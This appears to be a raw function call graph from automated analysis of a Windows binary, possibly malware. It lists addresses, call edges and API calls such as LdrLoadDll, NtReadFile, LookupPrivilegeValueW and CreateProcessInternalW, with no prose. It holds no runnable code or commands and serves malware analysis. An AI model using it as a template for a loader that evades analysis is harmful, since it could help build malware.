34049->33897 34050->33897 34051->33889 34052->33909 34053->33961 34066 64a640 34054->34066 34056 64bfb8 34056->33989 34058 64af70 LdrLoadDll 34057->34058 34059 64a43c NtReadFile 34058->34059 34059->33990 34061 64bbc4 34060->34061 34062 64bbad 34060->34062 34061->34001 34062->34061 34063 64bfa0 2 API calls 34062->34063 34064 64bbdb 34063->34064 34064->34001 34065->33991 34067 64af70 LdrLoadDll 34066->34067 34068 64a65c RtlAllocateHeap 34067->34068 34068->34056 34069->34011 34071 64a3ec 34070->34071 34072 64af70 LdrLoadDll 34070->34072 34075 4819560 LdrInitializeThunk 34071->34075 34072->34071 34073 64491a 34073->34048 34075->34073 34077 644081 34076->34077 34078 644089 34076->34078 34077->33925 34107 64435c 34078->34107 34203 64cf40 34078->34203 34080 6440dd 34081 64cf40 2 API calls 34080->34081 34082 6440e8 34081->34082 34083 644136 34082->34083 34086 64d070 3 API calls 34082->34086 34217 64cfe0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34082->34217 34085 64cf40 2 API calls 34083->34085 34088 64414a 34085->34088 34086->34082 34087 6441a7 34089 64cf40 2 API calls 34087->34089 34088->34087 34208 64d070 34088->34208 34091 6441bd 34089->34091 34092 6441fa 34091->34092 34094 64d070 3 API calls 34091->34094 34093 64cf40 2 API calls 34092->34093 34095 644205 34093->34095 34094->34091 34096 64d070 3 API calls 34095->34096 34103 64423f 34095->34103 34096->34095 34099 64cfa0 2 API calls 34100 64433e 34099->34100 34101 64cfa0 2 API calls 34100->34101 34102 644348 34101->34102 34104 64cfa0 2 API calls 34102->34104 34214 64cfa0 34103->34214 34105 644352 34104->34105 34106 64cfa0 2 API calls 34105->34106 34106->34107 34107->33925 34109 6453a1 34108->34109 34110 644a50 10 API calls 34109->34110 34112 6453b7 34110->34112 34111 64540a 34111->33928 34112->34111 34113 645405 34112->34113 34114 6453f2 34112->34114 34116 64bdd0 2 API calls 34113->34116 34115 64bdd0 2 API calls 34114->34115 34117 6453f7 34115->34117 34116->34111 34117->33928 34119 64ad94 34118->34119 34120 64ac40 LdrLoadDll 34118->34120 34218 64ac40 34119->34218 34120->34119 34123 64ac40 LdrLoadDll 34124 64ada6 34123->34124 34125 64ac40 LdrLoadDll 34124->34125 34126 64adaf 34125->34126 34127 64ac40 LdrLoadDll 34126->34127 34128 64adb8 34127->34128 34129 64ac40 LdrLoadDll 34128->34129 34130 64adc1 34129->34130 34131 64ac40 LdrLoadDll 34130->34131 34132 64adcd 34131->34132 34133 64ac40 LdrLoadDll 34132->34133 34134 64add6 34133->34134 34135 64ac40 LdrLoadDll 34134->34135 34136 64addf 34135->34136 34137 64ac40 LdrLoadDll 34136->34137 34138 64ade8 34137->34138 34139 64ac40 LdrLoadDll 34138->34139 34140 64adf1 34139->34140 34141 64ac40 LdrLoadDll 34140->34141 34142 64adfa 34141->34142 34143 64ac40 LdrLoadDll 34142->34143 34144 64ae06 34143->34144 34145 64ac40 LdrLoadDll 34144->34145 34146 64ae0f 34145->34146 34147 64ac40 LdrLoadDll 34146->34147 34148 64ae18 34147->34148 34149 64ac40 LdrLoadDll 34148->34149 34150 64ae21 34149->34150 34151 64ac40 LdrLoadDll 34150->34151 34152 64ae2a 34151->34152 34153 64ac40 LdrLoadDll 34152->34153 34154 64ae33 34153->34154 34155 64ac40 LdrLoadDll 34154->34155 34156 64ae3f 34155->34156 34157 64ac40 LdrLoadDll 34156->34157 34158 64ae48 34157->34158 34159 64ac40 LdrLoadDll 34158->34159 34160 64ae51 34159->34160 34161 64ac40 LdrLoadDll 34160->34161 34162 64ae5a 34161->34162 34163 64ac40 LdrLoadDll 34162->34163 34164 64ae63 34163->34164 34165 64ac40 LdrLoadDll 34164->34165 34166 64ae6c 34165->34166 34167 64ac40 LdrLoadDll 34166->34167 34168 64ae78 34167->34168 34169 64ac40 LdrLoadDll 34168->34169 34170 64ae81 34169->34170 34171 64ac40 LdrLoadDll 34170->34171 34172 64ae8a 34171->34172 34173 64ac40 LdrLoadDll 34172->34173 34174 64ae93 34173->34174 34175 64ac40 LdrLoadDll 34174->34175 34176 64ae9c 34175->34176 34177 64ac40 LdrLoadDll 34176->34177 34178 64aea5 34177->34178 34179 64ac40 LdrLoadDll 34178->34179 34180 64aeb1 34179->34180 34181 64ac40 LdrLoadDll 34180->34181 34182 64aeba 34181->34182 34183 64ac40 LdrLoadDll 34182->34183 34184 64aec3 34183->34184 34185 64ac40 LdrLoadDll 34184->34185 34186 64aecc 34185->34186 34187 64ac40 LdrLoadDll 34186->34187 34188 64aed5 34187->34188 34189 64ac40 LdrLoadDll 34188->34189 34190 64aede 34189->34190 34191 64ac40 LdrLoadDll 34190->34191 34192 64aeea 34191->34192 34193 64ac40 LdrLoadDll 34192->34193 34194 64aef3 34193->34194 34195 64ac40 LdrLoadDll 34194->34195 34196 64aefc 34195->34196 34196->33933 34198 64af70 LdrLoadDll 34197->34198 34199 649eec 34198->34199 34224 4819860 LdrInitializeThunk 34199->34224 34200 649f03 34200->33863 34202->33930 34204 64cf56 34203->34204 34205 64cf50 34203->34205 34206 64bfa0 2 API calls 34204->34206 34205->34080 34207 64cf7c 34206->34207 34207->34080 34209 64cfe0 34208->34209 34210 64bfa0 2 API calls 34209->34210 34211 64d03d 34209->34211 34212 64d01a 34210->34212 34211->34088 34213 64bdd0 2 API calls 34212->34213 34213->34211 34215 64bdd0 2 API calls 34214->34215 34216 644334 34215->34216 34216->34099 34217->34082 34219 64ac5b 34218->34219 34220 644e50 LdrLoadDll 34219->34220 34221 64ac7b 34220->34221 34222 644e50 LdrLoadDll 34221->34222 34223 64ad27 34221->34223 34222->34223 34223->34123 34224->34200 34226 4819681 34225->34226 34227 481968f LdrInitializeThunk 34225->34227 34226->33939 34227->33939 34229 64a68c 34228->34229 34230 64af70 LdrLoadDll 34229->34230 34231 64a69c RtlFreeHeap 34230->34231 34231->33942 34233 637eb0 34232->34233 34234 637eab 34232->34234 34235 64bd50 2 API calls 34233->34235 34234->33871 34241 637ed5 34235->34241 34236 637f38 34236->33871 34237 649ed0 2 API calls 34237->34241 34238 637f3e 34239 637f64 34238->34239 34242 64a5d0 2 API calls 34238->34242 34239->33871 34241->34236 34241->34237 34241->34238 34243 64bd50 2 API calls 34241->34243 34248 64a5d0 34241->34248 34244 637f55 34242->34244 34243->34241 34244->33871 34246 64a5d0 2 API calls 34245->34246 34247 63817e 34246->34247 34247->33828 34249 64a5ec 34248->34249 34250 64af70 LdrLoadDll 34248->34250 34253 48196e0 LdrInitializeThunk 34249->34253 34250->34249 34251 64a603 34251->34241 34253->34251 34255 64b5d3 34254->34255 34256 63acf0 LdrLoadDll 34255->34256 34257 639c5b 34256->34257 34257->33836 34259 63b063 34258->34259 34261 63b0e0 34259->34261 34273 649ca0 LdrLoadDll 34259->34273 34261->33841 34263 64af70 LdrLoadDll 34262->34263 34264 63f1bb 34263->34264 34264->33849 34265 64a7e0 34264->34265 34266 64af70 LdrLoadDll 34265->34266 34267 64a7ff LookupPrivilegeValueW 34266->34267 34267->33845 34269 64a28c 34268->34269 34270 64af70 LdrLoadDll 34268->34270 34274 4819910 LdrInitializeThunk 34269->34274 34270->34269 34271 64a2ab 34271->33846 34273->34261 34274->34271 34276 63b1c9 34275->34276 34277 63b040 LdrLoadDll 34276->34277 34278 63b204 34277->34278 34278->33781 34280 63af34 34279->34280 34375 649ca0 LdrLoadDll 34280->34375 34282 63af6e 34282->33783 34284 63f3ac 34283->34284 34285 63b1c0 LdrLoadDll 34284->34285 34286 63f3be 34285->34286 34376 63f290 34286->34376 34289 63f3f1 34291 63f402 34289->34291 34294 64a4a0 2 API calls 34289->34294 34290 63f3d9 34292 63f3e4 34290->34292 34293 64a4a0 2 API calls 34290->34293 34291->33786 34292->33786 34293->34292 34294->34291 34296 63f43c 34295->34296 34395 63b2b0 34296->34395 34298 63f44e 34299 63f290 3 API calls 34298->34299 34300 63f45f 34299->34300 34301 63f481 34300->34301 34302 63f469 34300->34302 34305 64a4a0 2 API calls 34301->34305 34306 63f492 34301->34306 34303 63f474 34302->34303 34304 64a4a0 2 API calls 34302->34304 34303->33788 34304->34303 34305->34306 34306->33788 34308 63caa6 34307->34308 34309 63cab0 34307->34309 34308->33797 34310 63af10 LdrLoadDll 34309->34310 34312 63cb4e 34310->34312 34311 63cb74 34311->33797 34312->34311 34313 63b040 LdrLoadDll 34312->34313 34314 63cb90 34313->34314 34315 644a50 10 API calls 34314->34315 34316 63cbe5 34315->34316 34316->33797 34318 63d6e5 34317->34318 34319 63d797 34318->34319 34320 63d6f7 34318->34320 34321 63b040 LdrLoadDll 34319->34321 34322 63b040 LdrLoadDll 34320->34322 34323 63d7a6 34321->34323 34324 63d706 34322->34324 34416 63cf20 34323->34416 34326 63b040 LdrLoadDll 34324->34326 34328 63d7e4 34324->34328 34327 63d72b 34326->34327 34329 63b040 LdrLoadDll 34327->34329 34328->33807 34330 63d749 34329->34330 34399 63d150 34330->34399 34332 63d75c 34333 63b040 LdrLoadDll 34332->34333 34336 63d767 34332->34336 34334 63d7f4 34333->34334 34427 63cfe0 34334->34427 34336->33807 34338 63d89d 34340 63d150 4 API calls 34338->34340 34339 64a4a0 2 API calls 34341 63d81f 34339->34341 34342 63d8b3 34340->34342 34345 63b040 LdrLoadDll 34341->34345 34346 63d8ba 34342->34346 34431 63d3d0 34342->34431 34344 63d8f7 34344->33807 34347 63d843 34345->34347 34346->33807 34348 63cfe0 2 API calls 34347->34348 34349 63d859 34348->34349 34350 64a4a0 2 API calls 34349->34350 34351 63d863 34350->34351 34352 63b040 LdrLoadDll 34351->34352 34353 63d887 34352->34353 34354 63cfe0 2 API calls 34353->34354 34354->34338 34358 638d14 34355->34358 34503 63f6d0 34355->34503 34357 638f25 34357->33812 34358->34357 34508 6443a0 34358->34508 34360 638d70 34360->34357 34511 638ab0 34360->34511 34363 64cf40 2 API calls 34364 638db2 34363->34364 34365 64d070 3 API calls 34364->34365 34367 638dc7 34365->34367 34366 637ea0 4 API calls 34366->34367 34367->34357 34367->34366 34370 638160 2 API calls 34367->34370 34371 63c7b0 22 API calls 34367->34371 34516 63f670 34367->34516 34520 63f080 34367->34520 34370->34367 34371->34367 34372->33789 34373->33806 34374->33810 34375->34282 34377 63f2aa 34376->34377 34385 63f360 34376->34385 34378 63b040 LdrLoadDll 34377->34378 34379 63f2cc 34378->34379 34386 649f50 34379->34386 34381 63f30e 34389 649f90 34381->34389 34384 64a4a0 2 API calls 34384->34385 34385->34289 34385->34290 34387 64af70 LdrLoadDll 34386->34387 34388 649f6c 34387->34388 34388->34381 34390 649fac 34389->34390 34391 64af70 LdrLoadDll 34389->34391 34394 4819fe0 LdrInitializeThunk 34390->34394 34391->34390 34392 63f354 34392->34384 34394->34392 34396 63b2ba 34395->34396 34397 63b040 LdrLoadDll 34396->34397 34398 63b313 34397->34398 34398->34298 34400 63d17c 34399->34400 34401 63cfe0 2 API calls 34400->34401 34402 63d1c6 34401->34402 34403 63d268 34402->34403 34472 64a1b0 34402->34472 34403->34332 34405 63d25f 34406 64a4a0 2 API calls 34405->34406 34406->34403 34407 63d1ed 34407->34405 34408 63d274 34407->34408 34409 64a1b0 2 API calls 34407->34409 34410 64a4a0 2 API calls 34408->34410 34409->34407 34411 63d27d 34410->34411 34412 63d2ec 34411->34412 34413 63cfe0 2 API calls 34411->34413 34412->34332 34414 63d296 34413->34414 34414->34412 34415 644e50 LdrLoadDll 34414->34415 34415->34412 34417 63cf4c 34416->34417 34418 64a1f0 LdrLoadDll 34417->34418 34419 63cf65 34418->34419 34420 63cf6c 34419->34420 34478 64a230 34419->34478 34420->34324 34424 63cfa7 34425 64a4a0 2 API calls 34424->34425 34426 63cfca 34425->34426 34426->34324 34428 63d005 34427->34428 34487 64a0a0 34428->34487 34432 63d3f5 34431->34432 34433 63d403 34432->34433 34434 63d417 34432->34434 34435 63b040 LdrLoadDll 34433->34435 34436 63b040 LdrLoadDll 34434->34436 34437 63d412 34435->34437 34438 63d426 34436->34438 34439 63b040 LdrLoadDll 34437->34439 34441 63d614 34437->34441 34440 63cf20 3 API calls 34438->34440 34442 63d486 34439->34442 34440->34437 34441->34344 34443 63b040 LdrLoadDll 34442->34443 34444 63d4b7 34443->34444 34445 63d5b0 34444->34445 34446 63cfe0 2 API calls 34444->34446 34447 63cfe0 2 API calls 34445->34447 34448 63d4da 34446->34448 34449 63d5c9 34447->34449 34450 63d4e5 34448->34450 34451 63d58f 34448->34451 34493 63d090 34449->34493 34453 64a4a0 2 API calls 34450->34453 34456 63b040 LdrLoadDll 34451->34456 34454 63d4ef 34453->34454 34458 63b040 LdrLoadDll 34454->34458 34455 64a4a0 2 API calls 34455->34441 34456->34445 34457 63d5d9 34457->34455 34459 63d513 34458->34459 34460 63cfe0 2 API calls 34459->34460 34461 63d529 34460->34461 34462 64a4a0 2 API calls 34461->34462 34463 63d533 34462->34463 34464 63b040 LdrLoadDll 34463->34464 34465 63d557 34464->34465 34466 63cfe0 2 API calls 34465->34466 34467 63d56d 34466->34467 34468 63d090 2 API calls 34467->34468 34469 63d57d 34468->34469 34470 64a4a0 2 API calls 34469->34470 34471 63d587 34470->34471 34471->34344 34473 64af70 LdrLoadDll 34472->34473 34474 64a1cc 34473->34474 34477 4819610 LdrInitializeThunk 34474->34477 34475 64a1eb 34475->34407 34477->34475 34479 64a24c 34478->34479 34480 64af70 LdrLoadDll 34478->34480 34486 4819710 LdrInitializeThunk 34479->34486 34480->34479 34481 63cf8f 34481->34420 34483 64a820 34481->34483 34484 64af70 LdrLoadDll 34483->34484 34485 64a83f 34484->34485 34485->34424 34486->34481 34488 64af70 LdrLoadDll 34487->34488 34489 64a0bc 34488->34489 34490 63d079 34489->34490 34492 48196d0 LdrInitializeThunk 34489->34492 34490->34338 34490->34339 34492->34490 34494 63d0b4 34493->34494 34497 64a0f0 34494->34497 34498 64af70 LdrLoadDll 34497->34498 34499 64a10c 34498->34499 34502 4819b00 LdrInitializeThunk 34499->34502 34500 63d13b 34500->34457 34502->34500 34504 63f6ef 34503->34504 34505 644e50 LdrLoadDll 34503->34505 34506 63f6f6 SetErrorMode 34504->34506 34507 63f6fd 34504->34507 34505->34504 34506->34507 34507->34358 34548 63f4a0 34508->34548 34510 6443c6 34510->34360 34512 64bd50 2 API calls 34511->34512 34515 638ad5 34511->34515 34512->34515 34513 638cea 34513->34363 34515->34513 34567 649890 34515->34567 34517 63f683 34516->34517 34595 649ea0 34517->34595 34521 63f090 34520->34521 34522 63f0de 34520->34522 34521->34522 34632 63d910 13 API calls 34521->34632 34524 63f15e 34522->34524 34601 63dfc0 34522->34601 34651 6341d0 26 API calls 34524->34651 34525 63f0f0 34527 63f101 34525->34527 34648 63ec60 10 API calls 34525->34648 34531 63f124 34527->34531 34535 63f11b 34527->34535 34649 63edc0 10 API calls 34527->34649 34528 63f0b6 34532 644a50 10 API calls 34528->34532 34606 63eed0 34531->34606 34536 63f0c7 34532->34536 34533 63f16d 34533->34367 34650 63ef40 13 API calls 34535->34650 34539 644a50 10 API calls 34536->34539 34542 63f0d8 34539->34542 34633 63efa0 34542->34633 34547 644a50 10 API calls 34547->34524 34549 63f4bd 34548->34549 34555 649fd0 34549->34555 34552 63f505 34552->34510 34556 64af70 LdrLoadDll 34555->34556 34557 649fec 34556->34557 34565 48199a0 LdrInitializeThunk 34557->34565 34558 63f4fe 34558->34552 34560 64a020 34558->34560 34561 64af70 LdrLoadDll 34560->34561 34562 64a03c 34561->34562 34566 4819780 LdrInitializeThunk 34562->34566 34563 63f52e 34563->34510 34565->34558 34566->34563 34568 64bfa0 2 API calls 34567->34568 34569 6498a7 34568->34569 34588 639310 34569->34588 34571 6498c2 34572 649900 34571->34572 34573 6498e9 34571->34573 34576 64bd50 2 API calls 34572->34576 34574 64bdd0 2 API calls 34573->34574 34575 6498f6 34574->34575 34575->34513 34577 64993a 34576->34577 34578 64bd50 2 API calls 34577->34578 34579 649953 34578->34579 34585 649bf4 34579->34585 34594 64bd90 LdrLoadDll 34579->34594 34581 649bd9 34582 649be0 34581->34582 34581->34585 34583 64bdd0 2 API calls 34582->34583 34584 649bea 34583->34584 34584->34513 34586 64bdd0 2 API calls 34585->34586 34587 649c49 34586->34587 34587->34513 34589 639335 34588->34589 34590 63acf0 LdrLoadDll 34589->34590 34591 639368 34590->34591 34592 63cf20 3 API calls 34591->34592 34593 63938d 34591->34593 34592->34593 34593->34571 34594->34581 34596 64af70 LdrLoadDll 34595->34596 34597 649ebc 34596->34597 34600 4819840 LdrInitializeThunk 34597->34600 34598 63f6ae 34598->34367 34600->34598 34603 63dfd8 34601->34603 34605 63e098 34601->34605 34602 63e031 34602->34525 34603->34602 34604 644a50 10 API calls 34603->34604 34604->34605 34605->34525 34607 63eee8 34606->34607 34611 63ef37 34606->34611 34607->34611 34652 63faa0 34607->34652 34609 63ef23 34609->34611 34664 63fcf0 13 API calls 34609->34664 34612 63ee00 34611->34612 34613 63ee1e 34612->34613 34615 63eeb8 34612->34615 34614 644a50 10 API calls 34613->34614 34613->34615 34614->34615 34615->34533 34616 63eaa0 34615->34616 34617 63eabc 34616->34617 34631 63eb9b 34616->34631 34620 64a4a0 2 API calls 34617->34620 34617->34631 34618 63ec31 34619 63ec4e 34618->34619 34621 644a50 10 API calls 34618->34621 34619->34524 34619->34547 34622 63ead7 34620->34622 34621->34619 34625 63d150 4 API calls 34622->34625 34623 63d150 4 API calls 34624 63ec0b 34623->34624 34624->34618 34627 63d3d0 5 API calls 34624->34627 34626 63eb0f 34625->34626 34628 63b040 LdrLoadDll 34626->34628 34627->34618 34629 63eb20 34628->34629 34630 63b040 LdrLoadDll 34629->34630 34630->34631 34631->34618 34631->34623 34632->34528 34665 643d70 34633->34665 34635 63efad 34703 642a50 34635->34703 34637 63efb3 34739 640e60 34637->34739 34639 63efb9 34762 641bd0 34639->34762 34641 63efc1 34796 642d70 34641->34796 34643 63efc7 34799 6433e0 34643->34799 34648->34527 34649->34535 34650->34531 34651->34533 34653 63fac5 34652->34653 34654 63b040 LdrLoadDll 34653->34654 34655 63fb80 34654->34655 34656 63b040 LdrLoadDll 34655->34656 34657 63fba4 34656->34657 34658 644a50 10 API calls 34657->34658 34660 63fbf7 34658->34660 34659 63fcb1 34659->34609 34660->34659 34661 63b040 LdrLoadDll 34660->34661 34662 63fc5e 34661->34662 34663 644a50 10 API calls 34662->34663 34663->34659 34664->34611 34666 643d98 34665->34666 34667 63b040 LdrLoadDll 34666->34667 34668 643dc7 34667->34668 34669 63cf20 3 API calls 34668->34669 34671 643dfa 34669->34671 34670 643e01 34670->34635 34671->34670 34672 63b040 LdrLoadDll 34671->34672 34673 643e29 34672->34673 34674 63b040 LdrLoadDll 34673->34674 34675 643e4d 34674->34675 34676 63cfe0 2 API calls 34675->34676 34677 643e71 34676->34677 34678 643eb3 34677->34678 34831 6436c0 34677->34831 34682 63b040 LdrLoadDll 34678->34682 34680 643e8a 34681 644036 34680->34681 34838 643ab0 12 API calls 34680->34838 34681->34635 34684 643ed3 34682->34684 34685 63cfe0 2 API calls 34684->34685 34686 643ef7 34685->34686 34687 643f3d 34686->34687 34688 643f14 34686->34688 34690 6436c0 10 API calls 34686->34690 34689 63cfe0 2 API calls 34687->34689 34688->34681 34839 643ab0 12 API calls 34688->34839 34692 643f6d 34689->34692 34690->34688 34693 643fb3 34692->34693 34694 643f8a 34692->34694 34695 6436c0 10 API calls 34692->34695 34697 63cfe0 2 API calls 34693->34697 34694->34681 34840 643ab0 12 API calls 34694->34840 34695->34694 34698 644012 34697->34698 34699 64405b 34698->34699 34700 64402f 34698->34700 34702 6436c0 10 API calls 34698->34702 34699->34635 34700->34681 34841 643ab0 12 API calls 34700->34841 34702->34700 34704 642ab4 34703->34704 34705 63b040 LdrLoadDll 34704->34705 34706 642b81 34705->34706 34707 63cf20 3 API calls 34706->34707 34709 642bb4 34707->34709 34708 642bbb 34708->34637 34709->34708 34710 63b040 LdrLoadDll 34709->34710 34711 642be3 34710->34711 34712 63cfe0 2 API calls 34711->34712 34713 642c23 34712->34713 34714 6436c0 10 API calls 34713->34714 34736 642d43 34713->34736 34715 642c40 34714->34715 34716 642d52 34715->34716 34842 642870 34715->34842 34717 64a4a0 2 API calls 34716->34717 34719 642d5c 34717->34719 34719->34637 34720 642c58 34720->34716 34721 642c63 34720->34721 34722 64bfa0 2 API calls 34721->34722 34723 642c8c 34722->34723 34724 642c95 34723->34724 34725 642cab 34723->34725 34726 64a4a0 2 API calls 34724->34726 34871 642760 CoInitialize 34725->34871 34729 642c9f 34726->34729 34728 642cb9 34730 64a1b0 2 API calls 34728->34730 34729->34637 34738 642cd7 34730->34738 34731 642d32 34732 64a4a0 2 API calls 34731->34732 34734 642d3c 34732->34734 34735 64bdd0 2 API calls 34734->34735 34735->34736 34736->34637 34737 64a1b0 2 API calls 34737->34738 34738->34731 34738->34737 34873 642690 10 API calls 34738->34873 34740 640e88 34739->34740 34741 64bfa0 2 API calls 34740->34741 34743 640ee8 34741->34743 34742 640ef1 34742->34639 34743->34742 34874 640b30 34743->34874 34745 640f18 34746 640f36 34745->34746 34909 6417c0 13 API calls 34745->34909 34751 640f50 34746->34751 34911 63ae40 LdrLoadDll 34746->34911 34748 640f2a 34910 6417c0 13 API calls 34748->34910 34752 640b30 12 API calls 34751->34752 34753 640f7b 34752->34753 34754 640f9a 34753->34754 34912 6417c0 13 API calls 34753->34912 34756 640fb4 34754->34756 34914 63ae40 LdrLoadDll 34754->34914 34759 64bdd0 2 API calls 34756->34759 34757 640f8e 34913 6417c0 13 API calls 34757->34913 34761 640fbe 34759->34761 34761->34639 34763 641bf6 34762->34763 34764 641c8e 34763->34764 34765 641c08 34763->34765 34770 641c6c 34764->34770 34924 642d90 34764->34924 34766 63b040 LdrLoadDll 34765->34766 34769 641c19 34766->34769 34772 641c37 34769->34772 34774 63b040 LdrLoadDll 34769->34774 34773 641c86 34770->34773 34929 6488e0 34770->34929 34771 641ccb 34788 641d20 34771->34788 34955 641380 34771->34955 34777 63b040 LdrLoadDll 34772->34777 34773->34641 34774->34772 34776 641ce3 34779 641d2c 34776->34779 34780 641cea 34776->34780 34778 641c5b 34777->34778 34781 644a50 10 API calls 34778->34781 34782 63b040 LdrLoadDll 34779->34782 34783 641cf2 34780->34783 34784 641d0f 34780->34784 34781->34770 34789 641d3d 34782->34789 34786 64bdd0 2 API calls 34783->34786 34785 64bdd0 2 API calls 34784->34785 34785->34788 34787 641d03 34786->34787 34787->34641 34788->34641 34966 640fe0 34789->34966 34791 641e3f 34792 64bdd0 2 API calls 34791->34792 34793 641e46 34792->34793 34793->34641 34794 641d57 34794->34791 34972 6416f0 11 API calls 34794->34972 34797 642d81 34796->34797 34798 641bd0 13 API calls 34796->34798 34797->34643 34798->34797 34800 6433e9 34799->34800 34801 63acf0 LdrLoadDll 34800->34801 34802 643418 34801->34802 34803 644e50 LdrLoadDll 34802->34803 34822 63efd3 34802->34822 34804 643442 34803->34804 34805 644e50 LdrLoadDll 34804->34805 34806 643455 34805->34806 34807 644e50 LdrLoadDll 34806->34807 34808 643468 34807->34808 34809 644e50 LdrLoadDll 34808->34809 34810 64347b 34809->34810 34811 644e50 LdrLoadDll 34810->34811 34812 643491 34811->34812 34813 644e50 LdrLoadDll 34812->34813 34814 6434a4 34813->34814 34815 644e50 LdrLoadDll 34814->34815 34816 6434b7 34815->34816 34817 644e50 LdrLoadDll 34816->34817 34818 6434ca 34817->34818 34819 644e50 LdrLoadDll 34818->34819 34820 6434df 34819->34820 34821 6436c0 10 API calls 34820->34821 34820->34822 34823 643561 34821->34823 34825 6460e0 34822->34825 34823->34822 35003 642fa0 34823->35003 34826 646138 34825->34826 34830 63efdf 34826->34830 35008 645d40 34826->35008 34828 6461a3 34828->34830 35046 645ff0 34828->35046 34830->34522 34833 643735 34831->34833 34832 6438c2 34832->34680 34833->34832 34834 644a50 10 API calls 34833->34834 34835 6438a2 34834->34835 34835->34832 34836 644a50 10 API calls 34835->34836 34837 6438b3 34836->34837 34837->34680 34838->34678 34839->34687 34840->34693 34841->34699 34843 64288c 34842->34843 34844 63acf0 LdrLoadDll 34843->34844 34845 6428a7 34844->34845 34846 6428b0 34845->34846 34847 644e50 LdrLoadDll 34845->34847 34846->34720 34848 6428c7 34847->34848 34849 644e50 LdrLoadDll 34848->34849 34850 6428dc 34849->34850 34851 644e50 LdrLoadDll 34850->34851 34852 6428ef 34851->34852 34853 644e50 LdrLoadDll 34852->34853 34854 642902 34853->34854 34855 644e50 LdrLoadDll 34854->34855 34856 642918 34855->34856 34857 644e50 LdrLoadDll 34856->34857 34858 64292b 34857->34858 34859 63acf0 LdrLoadDll 34858->34859 34860 642954 34859->34860 34861 644e50 LdrLoadDll 34860->34861 34870 6429f0 34860->34870 34862 642978 34861->34862 34863 63acf0 LdrLoadDll 34862->34863 34864 6429ad 34863->34864 34865 644e50 LdrLoadDll 34864->34865 34864->34870 34866 6429ca 34865->34866 34867 644e50 LdrLoadDll 34866->34867 34868 6429dd 34867->34868 34869 644e50 LdrLoadDll 34868->34869 34869->34870 34870->34720 34872 6427c5 34871->34872 34872->34728 34873->34738 34875 640bc8 34874->34875 34876 63b040 LdrLoadDll 34875->34876 34877 640c66 34876->34877 34878 63b040 LdrLoadDll 34877->34878 34879 640c81 34878->34879 34880 63cfe0 2 API calls 34879->34880 34881 640ca6 34880->34881 34882 640e11 34881->34882 34915 64a130 34881->34915 34883 640e22 34882->34883 34886 63faa0 10 API calls 34882->34886 34883->34745 34886->34883 34887 640e07 34888 64a4a0 2 API calls 34887->34888 34888->34882 34889 640cdc 34890 64a4a0 2 API calls 34889->34890 34891 640d1f 34890->34891 34920 64c070 LdrLoadDll 34891->34920 34893 640d58 34894 640d5f 34893->34894 34895 63cfe0 2 API calls 34893->34895 34894->34745 34896 640d76 34895->34896 34896->34883 34897 64a130 2 API calls 34896->34897 34898 640d9b 34897->34898 34899 640da2 34898->34899 34900 640dee 34898->34900 34902 64a4a0 2 API calls 34899->34902 34901 64a4a0 2 API calls 34900->34901 34903 640df8 34901->34903 34904 640dac 34902->34904 34903->34745 34921 6400c0 LdrLoadDll 34904->34921 34906 640dc9 34906->34883 34922 640890 10 API calls 34906->34922 34908 640ddf 34908->34745 34909->34748 34910->34746 34911->34751 34912->34757 34913->34754 34914->34756 34916 64af70 LdrLoadDll 34915->34916 34917 64a14c 34916->34917 34923 4819650 LdrInitializeThunk 34917->34923 34918 640cd1 34918->34887 34918->34889 34920->34893 34921->34906 34922->34908 34923->34918 34925 63b040 LdrLoadDll 34924->34925 34926 642dac 34925->34926 34927 642e65 34926->34927 34928 644a50 10 API calls 34926->34928 34927->34770 34928->34927 34930 6488ee 34929->34930 34931 6488f5 34929->34931 34930->34771 34932 63acf0 LdrLoadDll 34931->34932 34933 648920 34932->34933 34934 648a74 34933->34934 34935 64bfa0 2 API calls 34933->34935 34934->34771 34936 648938 34935->34936 34936->34934 34973 641180 LdrLoadDll 34936->34973 34938 648956 34939 644e50 LdrLoadDll 34938->34939 34940 64896c 34939->34940 34941 644e50 LdrLoadDll 34940->34941 34942 648988 34941->34942 34943 644e50 LdrLoadDll 34942->34943 34944 6489a4 34943->34944 34945 644e50 LdrLoadDll 34944->34945 34946 6489c3 34945->34946 34947 644e50 LdrLoadDll 34946->34947 34948 6489df 34947->34948 34949 644e50 LdrLoadDll 34948->34949 34950 6489fb 34949->34950 34951 644e50 LdrLoadDll 34950->34951 34952 648a21 34951->34952 34953 64bdd0 2 API calls 34952->34953 34954 648a64 34952->34954 34953->34934 34954->34771 34957 6413a4 34955->34957 34956 6415c0 34956->34776 34957->34956 34958 6414d2 34957->34958 34961 641578 34957->34961 34960 644a50 10 API calls 34958->34960 34959 6415b1 34959->34776 34963 6414e2 34960->34963 34961->34959 34962 644a50 10 API calls 34961->34962 34962->34959 34963->34956 34964 644a50 10 API calls 34963->34964 34965 641569 34964->34965 34965->34776 34967 641006 34966->34967 34968 63b040 LdrLoadDll 34967->34968 34969 64103c 34968->34969 34974 63d310 34969->34974 34971 6410ff 34971->34794 34972->34794 34973->34938 34975 63d327 34974->34975 34983 63f710 34975->34983 34979 63d39b 34980 63d3a2 34979->34980 34994 64a2b0 LdrLoadDll 34979->34994 34980->34971 34982 63d3b5 34982->34971 34984 63f735 34983->34984 34995 6381a0 34984->34995 34986 63f759 34987 63d36f 34986->34987 34988 644a50 10 API calls 34986->34988 34990 64bdd0 2 API calls 34986->34990 35002 63f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34986->35002 34991 64a6f0 34987->34991 34988->34986 34990->34986 34992 64a70f CreateProcessInternalW 34991->34992 34993 64af70 LdrLoadDll 34991->34993 34992->34979 34993->34992 34994->34982 34996 63829f 34995->34996 34997 6381b5 34995->34997 34996->34986 34997->34996 34998 644a50 10 API calls 34997->34998 35000 638222 34998->35000 34999 638249 34999->34986 35000->34999 35001 64bdd0 LdrLoadDll RtlFreeHeap 35000->35001 35001->34999 35002->34986 35004 6433ce 35003->35004 35005 643058 35003->35005 35004->34823 35005->35004 35006 642e80 LdrLoadDll 35005->35006 35007 644a50 10 API calls 35005->35007 35006->35005 35007->35005 35010 645d56 35008->35010 35012 645d7f 35008->35012 35009 645de8 35011 645e09 35009->35011 35014 644e50 LdrLoadDll 35009->35014 35017 63acf0 LdrLoadDll 35010->35017 35015 645e2b 35011->35015 35018 644e50 LdrLoadDll 35011->35018 35013 645db3 35012->35013 35021 63acf0 LdrLoadDll 35012->35021 35013->35009 35023 63acf0 LdrLoadDll 35013->35023 35014->35011 35016 645e4d 35015->35016 35019 644e50 LdrLoadDll 35015->35019 35020 645e6e 35016->35020 35022 644e50 LdrLoadDll 35016->35022 35017->35012 35018->35015 35019->35016 